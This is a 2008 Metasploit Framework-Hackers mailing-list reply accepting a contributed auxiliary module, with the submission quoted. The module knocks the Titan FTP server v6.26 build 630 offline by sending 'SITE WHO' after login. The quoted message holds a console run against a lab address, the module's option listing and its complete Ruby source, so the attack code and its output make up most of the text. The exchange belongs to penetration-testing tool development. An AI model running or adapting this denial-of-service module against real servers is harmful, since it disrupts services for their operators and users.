Added. Thanks! Best regards,
On Tue, 2008-10-14 at 19:38 -0500, Kris Katterjohn wrote: > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA1 > > Hey guys, > > I've attached a DoS auxiliary module for the Titan FTP server v6.26 build 630, > based on the Python script from earlier today. > > > msf > use dos/ftp/titan626_site > msf auxiliary(titan626_site) > set RHOST 192.168.10.2 > RHOST => 192.168.10.2 > msf auxiliary(titan626_site) > set FTPUSER test > FTPUSER => test > msf auxiliary(titan626_site) > set FTPPASS test > FTPPASS => test > msf auxiliary(titan626_site) > run > [*] Connecting to FTP server 192.168.10.2:21... > [*] Connected to target FTP server. > [*] Authenticating as test with password test... > [*] Sending password... > [*] Sending command... > [*] Auxiliary module execution completed > > > msf auxiliary(titan626_site) > info > > Name: Titan FTP Server 6.26.630 SITE WHO DoS > Version: 1 > > Provided by: > Kris Katterjohn <[EMAIL PROTECTED]> > > Basic options: > Name Current Setting Required Description > ---- --------------- -------- ----------- > FTPPASS test yes Valid FTP password for username > FTPUSER test yes Valid FTP username > RHOST 192.168.10.2 yes The target address > RPORT 21 yes The target port > > Description: > The Titan FTP server v6.26 build 630 can be DoS'd by issuing "SITE > WHO". You need a valid login so you can send this command. > > > Thanks, > Kris Katterjohn > > -----BEGIN PGP SIGNATURE----- > Version: GnuPG v1.4.6 (GNU/Linux) > Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org > > iQIVAwUBSPU7kv9K37xXYl36AQL/DA//YHo5MLoeVi2YWZ5OtEiCZeT1oFJoUkvW > FEAtf3kXMU8sg3ndelJTDR670TkDy/hfYE5ZqNyEjb6sLslAOCso1og3g7z5dCsQ > x5ApNjTjmNiiQyY4uErpa/a1sORUGiIXrfn4Cyf3fZT4aA+G8ATUo6Y1ypi3IrAY > QkEK+9aQuAmhzbVhsFPnmIduHuCAHakpEjx4az9U+3j2+LUkBV94kn6tnLlMazjQ > 2zVBrar9WrPQlpNzkaH7KMUpMft057+2H/UxWROjzXDGISfCkhqXwweyKeOk7lTT > gW+fDLxu2rbyR2X2G0nnEOSaWomeCrm2OZoQx+R/lciiB68vsFBBcf9kIQbs1r89 > 75nW9uxbtEGPSHYEXeabqL8KgCC+ckxUOzJL6sbnf3BasGvyPYdNi/yARGImIhUL > pbEyUO3YQRtwI3KcohpGHXNdf+9p72iOKRqH3vdLKNjlde0mLMh6QsJs1fieIaPE > hYgE9qs221I18TTmZljmLh6RyFoaM98eTHMCAUGJZlogr9d2ypv5/HQZnVN+2vlp > vCbpz7gfd61Db+cBTPWhBvGT28JArGr2ktsoJZiPmj6+ehWkZR2UjnGwSghwu6A6 > xCpP0xjTxFKqLgqCUWu0Fer2s2P3yq+FV5OXHzawYFSCf7rJLM8qIcPJP1NksAXf > ReymTAm6UCc= > =0ama > -----END PGP SIGNATURE----- > plain text document attachment (titan626_site.rb) > require 'msf/core' > > class Metasploit3 < Msf::Auxiliary > > include Msf::Exploit::Remote::Ftp > > def initialize(info = {}) > super(update_info(info, > 'Name' => 'Titan FTP Server 6.26.630 SITE WHO > DoS', > 'Description' => %q{ > The Titan FTP server v6.26 build 630 can be > DoS'd by > issuing "SITE WHO". You need a valid login so > you > can send this command. > }, > 'Author' => 'Kris Katterjohn <[EMAIL > PROTECTED]>', > 'License' => MSF_LICENSE, > 'Version' => '1', > 'References' => > [ [ 'URL', 'http://milw0rm.com/exploits/6753'] > ], > 'DisclosureDate' => 'Oct 14 2008')) > > # They're required > register_options([ > OptString.new('FTPUSER', [ true, 'Valid FTP username', > 'anonymous' ]), > OptString.new('FTPPASS', [ true, 'Valid FTP password > for username', 'anonymous' ]) > ]) > end > > def run > connect_login > print_status("Sending command...") > raw_send("SITE WHO\r\n") > sleep 1 > disconnect > end > end > > _______________________________________________ > Framework-Hackers mailing list > Framework-Hackers@spool.metasploit.com > http://spool.metasploit.com/mailman/listinfo/framework-hackers _______________________________________________ Framework-Hackers mailing list Framework-Hackers@spool.metasploit.com http://spool.metasploit.com/mailman/listinfo/framework-hackers
